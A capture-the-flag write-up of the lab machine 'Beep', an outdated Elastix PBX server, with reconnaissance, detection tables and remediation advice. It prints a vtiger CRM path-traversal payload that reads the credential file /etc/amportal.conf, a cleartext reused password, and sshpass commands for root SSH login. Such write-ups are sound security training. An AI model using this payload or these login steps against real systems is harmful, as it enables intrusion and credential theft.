Overview
Beep is an Easy-rated Linux machine running Elastix, a unified communications platform built on Asterisk PBX. The system exposes 15 services across a broad attack surface: SSH, HTTPS, SMTP, POP3, IMAP, MySQL, Webmin, HylaFAX, and the Asterisk Manager Interface. The entire stack dates from 2006 to 2008. CentOS 5.6 reached end-of-life in 2017.
The attack chain is a single step: the Elastix installation uses one password
(jEhdIekWmdjE) for every service, including root SSH. Direct root login
yields both flags without privilege escalation. A vtiger CRM local file
inclusion vulnerability (EDB-37637) exists and would disclose these credentials
from /etc/amportal.conf, but was confirmed only post-exploitation due to
TLS incompatibility between the attacker’s modern OpenSSL and the target’s
SSLv3/TLS 1.0.
Reconnaissance
The host blocks ICMP, requiring the -Pn flag for nmap:
nmap -sV -sC -Pn 10.129.229.183| Port | Service | Product / Version | Notes |
|---|---|---|---|
| 22 | SSH | OpenSSH 4.3 (protocol 2.0) | Legacy algorithms only |
| 25 | SMTP | Postfix smtpd | |
| 80 | HTTP | Apache httpd 2.2.3 (CentOS) | Redirects to HTTPS |
| 110 | POP3 | Cyrus pop3d 2.3.7 | |
| 143 | IMAP | Cyrus imapd 2.3.7 | |
| 443 | HTTPS | Apache httpd 2.2.3 (CentOS) | Elastix PBX login page |
| 993 | IMAPS | Cyrus imapd | |
| 995 | POP3S | Cyrus pop3d | |
| 3306 | MySQL | MySQL (unauthorized) | |
| 4190 | Sieve | Cyrus timsieved 2.3.7 | |
| 4445 | upnotifyp | Unknown | |
| 4559 | HylaFAX | HylaFAX 4.3.1 | |
| 5038 | Asterisk | Asterisk Call Manager 1.1 | |
| 10000 | HTTP | MiniServ 1.570 (Webmin) | Requires HTTPS |
Fifteen open ports. A complete unified communications stack.
Attack Surface Analysis
The broad service exposure creates multiple potential attack vectors:
vtiger CRM LFI (EDB-37637): The graph.php endpoint accepts a
current_language parameter passed to a PHP include() call without
sanitisation. A null byte truncates the appended suffix (works on PHP 5.1.6,
prior to the fix in PHP 5.3.4). The payload
../../../../../../../../etc/amportal.conf%00 retrieves the Elastix
configuration file containing all service passwords in cleartext.
Webmin Shellshock (CVE-2014-6271): Webmin 1.570 dispatches requests through CGI scripts processed by Bash. If the Bash version is unpatched, HTTP headers propagate into CGI environment variables, providing a command injection vector.
Universal password reuse: All Elastix services share a single password.
Both web-based vectors were blocked by a tooling barrier: the attacker’s OpenSSL 3.5 (Fedora 43) refuses SSLv3/TLS 1.0, and the target only supports those protocols. This is an interesting situation where modern security defaults on the attacker’s machine actually blocked the intended exploitation path, forcing an alternative approach.
The LFI payload for vtiger CRM would be:
GET /vtigercrm/graph.php?current_language=../../../../../../../../etc/amportal.conf%00&module=Accounts&actionThe null byte (%00) truncates the appended file suffix because the target
runs PHP 5.1.6, prior to the fix in PHP 5.3.4 that eliminated null byte
injection in file operations.
| Attribute | Value |
|---|---|
| Vulnerability | Universal password reuse (CWE-522) |
| CVSS v3.1 | 9.8 (Critical) |
| Root cause | Single password for all services including root SSH |
| MITRE ATT&CK | T1078.001 (Valid Accounts: Default Accounts) |
Vulnerability Analysis
The /etc/amportal.conf file contains every credential for the Elastix
platform:
grep -E '(PASS|PASSWORD)' /etc/amportal.conf
# AMPDBPASS=jEhdIekWmdjE
# AMPMGRPASS=jEhdIekWmdjE
# FOPPASSWORD=jEhdIekWmdjE
# ARI_ADMIN_PASSWORD=jEhdIekWmdjEThe same password appears in every field. The administrator set one credential and reused it for MySQL, the Asterisk Manager Interface, the Flash Operator Panel, the Asterisk Recording Interface, and the root system account.
Exploitation
SSH requires legacy algorithm negotiation. The attacker’s OpenSSH 10.0
disables ssh-rsa (SHA-1 based) by default. A temporary crypto-policy change
and custom SSH config are needed:
sudo update-crypto-policies --set LEGACY
cat /tmp/beep_ssh
# KexAlgorithms diffie-hellman-group14-sha1
# HostKeyAlgorithms ssh-rsa
# Ciphers aes128-ctr,aes256-ctr
# PubkeyAcceptedAlgorithms +ssh-rsa
# MACs hmac-sha2-256,hmac-sha1sshpass -p 'jEhdIekWmdjE' ssh -F /tmp/beep_ssh \
-o StrictHostKeyChecking=no \
[email protected] "id"
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)Both flags captured in a single command:
ssh -F /tmp/beep_ssh [email protected] \
"cat /home/fanis/user.txt; cat /root/root.txt"
# [flag redacted]
# [flag redacted]Post-Exploitation
With root access, I confirm the LFI vulnerability that would have provided the password through the web interface:
ls -la /var/www/html/vtigercrm/graph.php
# -rw-r--r-- 1 asterisk asterisk 3771 Sep 19 2006 graph.phpThe file exists at the expected path. The current_language parameter feeds
directly into include() without validation. On PHP 5.1.6, the null byte
truncation works as documented in EDB-37637. In a scenario without the TLS
incompatibility, this LFI would be the intended path to credential disclosure.
System enumeration reveals the age of the stack:
uname -a
# Linux beep 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686
cat /etc/redhat-release
# CentOS release 5.6 (Final)
php -v
# PHP 5.1.6 (cli) (built: Nov 29 2010)Linux 2.6.18, CentOS 5.6, PHP 5.1.6. Every component is well past end-of-life. The kernel build date of May 2011 confirms the system has not been updated in over a decade.
The Webmin Shellshock hypothesis (CVE-2014-6271) remains unconfirmed. Webmin
1.570 dispatches requests through CGI scripts processed by Bash. If the Bash
version is unpatched, HTTP headers (e.g. User-Agent) propagate into CGI
environment variables, providing a command injection vector. CentOS 5 did
receive a Shellshock patch (RHSA-2014:1306), so the vulnerability status is
unknown without capturing the Bash version. A future tester should verify
with bash --version and rpm -q bash.
Defensive Analysis
Detection opportunities
| Phase | MITRE ATT&CK | Detection |
|---|---|---|
| Initial access | T1078.001 | SSH root login from external IP (should be disabled entirely) |
| Credential access | T1552.001 | LFI reading /etc/amportal.conf (web server access logs) |
| Reconnaissance | T1046 | Port scan touching 15+ services from single source IP |
SSH: Root login via SSH should be disabled (PermitRootLogin no in
sshd_config). This single configuration change would have forced the
attacker through a more complex path.
LFI: Web application firewalls blocking path traversal sequences
(../) in query parameters would prevent the vtiger CRM LFI. The null byte
(%00) should also be blocked.
TLS: The fact that only SSLv3/TLS 1.0 is supported is itself a security finding. Modern clients refuse these protocols, but attackers with older tooling can still connect.
Remediation
| Priority | Action | Effort | Impact |
|---|---|---|---|
| P0 | Decommission or rebuild on a supported OS | High | Critical |
| P0 | Use unique passwords for each service | Low | Critical |
| P0 | Disable root SSH login | Low | Critical |
| P1 | Upgrade to TLS 1.2+ with modern cipher suites | Medium | High |
| P1 | Patch vtiger CRM or remove if unused | Medium | High |
| P2 | Reduce the service footprint: disable unused services (HylaFAX, Sieve, etc.) | Low | Medium |
| P3 | Implement network segmentation for PBX infrastructure | Medium | Medium |
CentOS 5.6 is well past end-of-life. The entire software stack is frozen at 2006-2008 patch levels. The correct remediation is decommissioning or a full rebuild on a supported distribution with modern PBX software.
Key Takeaways
-
Universal password reuse is a critical vulnerability. A single password across 15 services means compromising any one service compromises all of them. Each service should have a unique, randomly generated credential stored in a secrets manager.
-
Large attack surfaces multiply risk. Fifteen open ports mean fifteen opportunities for an attacker. Every unnecessary service is an additional attack vector. PBX systems should expose only the ports required for their function, with everything else firewalled.
-
Tooling compatibility matters for both attackers and defenders. Modern OpenSSL refusing legacy TLS actually blocked the web-based attack paths. This is not a defence to rely on (attackers can use older tools), but it illustrates that deprecating insecure protocols has practical security benefits.